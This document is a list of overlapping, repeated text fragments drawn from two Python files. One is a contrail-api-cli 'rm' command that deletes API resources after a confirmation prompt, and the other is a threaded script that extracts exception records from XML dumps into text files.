"predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message",
"..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource",
"from the API. .. warning:: `-r` option can be used to delete recursively",
"Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource",
"complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\")",
"to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if",
"for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref",
"self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda",
"path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and",
"back_refs of the resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\",",
"= Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for",
"_get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource)",
"resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for",
"def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource in back_refs:",
"from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API.",
"Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r` option can be",
"of the resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource",
"= self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: - %s\"\"\" %",
"%s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message):",
"back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return",
"continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r`",
"resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: - %s\"\"\"",
"can be used to delete recursively back_refs of the resource. \"\"\" description =",
"back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource))",
"r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message =",
"default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources:",
"__call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive:",
"option can be used to delete recursively back_refs of the resource. \"\"\" description",
"help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch()",
"recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force",
"import itertools from ..command import Command, Arg, Option, experimental, expand_paths from ..resource import",
"resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in",
"\"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\",",
"import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from",
"delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if force",
"= Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force =",
"expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources:",
"resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path',",
"= expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if",
"force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources,",
"API. .. warning:: `-r` option can be used to delete recursively back_refs of",
"confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource in",
"-*- import itertools from ..command import Command, Arg, Option, experimental, expand_paths from ..resource",
"..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API. ..",
"Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of",
"# -*- coding: utf-8 -*- import itertools from ..command import Command, Arg, Option,",
"\"\\n - \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for r",
"Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\",",
"Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental",
"if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs =",
"\"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources])",
"from ..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a",
"description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive",
"resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources,",
"in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False,",
"isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About",
"itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False):",
"<reponame>mrasskazov/contrail-api-cli<gh_stars>0 # -*- coding: utf-8 -*- import itertools from ..command import Command, Arg,",
"itertools from ..command import Command, Arg, Option, experimental, expand_paths from ..resource import Resource",
"back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs",
"back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def",
"resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\" % self.current_path(r)))",
"of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for",
"\"\"\"Delete a resource from the API. .. warning:: `-r` option can be used",
"for r in resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting",
"[]) if resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n -",
"be used to delete recursively back_refs of the resource. \"\"\" description = \"Delete",
"if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\" % self.current_path(r))) r.delete()",
"warning:: `-r` option can be used to delete recursively back_refs of the resource.",
"Command, Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt",
"= Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete",
"resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources",
"back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources =",
"from ..command import Command, Arg, Option, experimental, expand_paths from ..resource import Resource from",
"experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command):",
"resources, back_refs): for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource)",
"@experimental class Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r` option",
"help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs",
"used to delete recursively back_refs of the resource. \"\"\" description = \"Delete a",
"in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs,",
"resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children):",
"import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API. .. warning::",
"back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\")",
"delete recursively back_refs of the resource. \"\"\" description = \"Delete a resource\" paths",
"recursively back_refs of the resource. \"\"\" description = \"Delete a resource\" paths =",
"\"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\")",
"in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs)",
"for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self,",
"\".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for r in reversed(resources):",
"a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\",",
"Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to",
"metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children",
"..command import Command, Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils",
".. warning:: `-r` option can be used to delete recursively back_refs of the",
"action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in",
"% \"\\n - \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for",
"Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the",
"a resource from the API. .. warning:: `-r` option can be used to",
"the resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\",",
"message = \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r",
"resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs",
"self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n",
"recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources =",
"import Command, Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils import",
"the API. .. warning:: `-r` option can be used to delete recursively back_refs",
"resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False,",
"r in resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\"",
"recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: -",
"paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources",
"= \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in",
"- \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for r in",
"def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if",
"expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete"
] |
[
"urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'), url(r'', 'r_pass.views.home'),",
"include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'),",
"= patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'), url(r'', 'r_pass.views.home'), )",
"from django.conf.urls import patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'),",
"patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$',",
"import patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'),",
"url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'), url(r'',",
"django.conf.urls import patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$',"
] |
[
"glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with",
"with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename):",
"threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start()",
"= retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key]",
"= f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines",
"as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue",
"= chunks(files, threads) threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions,",
"with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def",
"as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files =",
"== 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception",
"{} for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = []",
"= glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for chunk in",
"glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for chunk in chunked_files:",
"ex_dict[key] if len(values) < 2: continue print(key) for value in values: print(f\"\\t{value}\") #",
"errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files",
"= ex_dict[key] if len(values) < 2: continue print(key) for value in values: print(f\"\\t{value}\")",
"ex_dict = {} for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception]",
"for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort()",
"= [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for",
"retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception",
"as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict",
"chunked_files = chunks(files, threads) threads = [] for chunk in chunked_files: t =",
"import chunks import threading import glob from pathlib import Path import os def",
"list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values) < 2:",
"\"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines",
"load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines)",
"for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with",
"file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict =",
"encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines =",
"ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys =",
"as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines)",
"utils import chunks import threading import glob from pathlib import Path import os",
"threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\",",
"retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions:",
"file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path)",
"+ \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads",
"ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in",
"files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore')",
"def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return",
"exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def",
"in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path,",
"with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines)",
"in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files =",
"for key in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key)",
"retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as",
"errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0:",
"from regex_matchers import retrieve_exceptions from utils import chunks import threading import glob from",
"t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\",",
"ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue",
"retrieve_exceptions from utils import chunks import threading import glob from pathlib import Path",
"path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with",
"lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file:",
"threading import glob from pathlib import Path import os def extract_exceptions(files): for path",
"len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for",
"in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\",",
"if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename):",
"encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8):",
"[] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t",
"os def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\"",
"output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def",
"errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\",",
"debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values",
"in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename)",
"f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines =",
"\"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception",
"threads) threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t)",
"pathlib import Path import os def extract_exceptions(files): for path in files: fileName =",
"if len(values) < 2: continue print(key) for value in values: print(f\"\\t{value}\") # debug_print(\"exceptions_minimized.txt\")",
"glob from pathlib import Path import os def extract_exceptions(files): for path in files:",
"\"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def",
"from utils import chunks import threading import glob from pathlib import Path import",
"files.sort() chunked_files = chunks(files, threads) threads = [] for chunk in chunked_files: t",
"t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\")",
"lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {}",
"excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files,",
"open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if",
"= load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception not in",
"encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) ==",
"[] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort()",
"output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads)",
"if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines())",
"encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\",",
"= \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines",
"open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\")",
"not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict =",
"extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile):",
"key in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key) for",
"= glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output:",
"import os def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile =",
"0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in",
"if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output:",
"output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines())",
"exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict",
"chunks import threading import glob from pathlib import Path import os def extract_exceptions(files):",
"threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for",
"regex_matchers import retrieve_exceptions from utils import chunks import threading import glob from pathlib",
"import Path import os def extract_exceptions(files): for path in files: fileName = Path(path).stem",
"= list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values) <",
"def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if",
"for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in",
"= threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\")",
"file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as",
"return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in",
"\"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\",",
"for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception)",
"for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path,",
"ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for",
"open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with",
"files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as",
"files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for chunk",
"errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines())",
"= [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys())",
"os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs",
"= Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore')",
"Path import os def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile",
"for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue",
"threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in",
"def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys:",
"from pathlib import Path import os def extract_exceptions(files): for path in files: fileName",
"files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\",",
"def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions: if",
"chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads:",
"import retrieve_exceptions from utils import chunks import threading import glob from pathlib import",
"Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as",
"\"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines =",
"chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files",
"output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\")",
"in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join()",
